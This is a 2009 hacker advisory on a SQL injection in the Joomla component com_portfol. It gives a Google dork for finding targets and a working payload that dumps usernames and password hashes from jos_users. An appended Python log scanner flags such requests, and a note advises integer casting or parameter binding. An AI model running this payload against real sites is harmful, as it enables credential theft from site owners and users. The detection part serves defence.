# Title : Joomla Component com_portfol SQL Injection Vulnerability
# Published : 2009-12-31
# Author : wlhaan hacker
_____________________________________________________
#Joomla Component Portfol SQL Injection Vulnerability#
#####################################################
# [+] Author : wlhaan hacker #
# [+] Email : iit@HoTMaiL.coM #
# [+] Site : www.sa-hacker.com/vb #
# [+] team wlhaan Hacker #
# [+] Dork : inurl:"com_portfol"
# [+]
#####################################################
Exploit:
[~] Exploit: /index.php?option=com_portfol&Itemid=814&task=viewcategory&vcatid=[SQL]
[~] Example: /index.php?option=com_portfol&Itemid=814&task=viewcategory&vcatid=-96+union+select+concat(username,char(58),password)KHG+from+jos_users--
########################################
and good luck :D
Thanks to : shooq hacker ..
#####################################################
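
Detection side of the request shown above, as an added example that is not part of the original advisory: it scans web access log lines for com_portfol requests whose vcatid is not a plain integer. The combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A legitimate category id is a plain non-negative integer.
INT_RE = re.compile(r"\d+")

# Constructed sample log lines; client addresses are documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [31/Dec/2009:10:00:00 +0000] "GET /index.php?option=com_portfol'
    '&Itemid=814&task=viewcategory&vcatid=12 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [31/Dec/2009:10:00:05 +0000] "GET /index.php?option=com_portfol'
    '&Itemid=814&task=viewcategory&vcatid=-96+union+select+concat(username,char(58),'
    'password)KHG+from+jos_users-- HTTP/1.1" 200 734',
    '192.0.2.11 - - [31/Dec/2009:10:00:09 +0000] "GET /index.php?option=com_content'
    '&view=article&id=5 HTTP/1.1" 200 8841',
]


def suspicious_vcatid(log_line):
    """Return the decoded vcatid if the line is a com_portfol request whose
    vcatid is not a plain integer (empty values included), else None."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    # parse_qs percent-decodes and turns '+' into spaces, so encoded
    # requests are compared in their decoded form.
    params = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
    if "com_portfol" not in params.get("option", []):
        return None
    for value in params.get("vcatid", []):
        if not INT_RE.fullmatch(value.strip()):
            return value
    return None


def scan(lines):
    """Return (line number, client address, decoded vcatid) for each hit."""
    hits = []
    for number, line in enumerate(lines, 1):
        value = suspicious_vcatid(line)
        if value is not None:
            hits.append((number, line.split()[0], value))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Log review only shows that the parameter was probed; the fix belongs in the component, where vcatid should be cast to an integer or bound as a query parameter before it reaches the SQL statement.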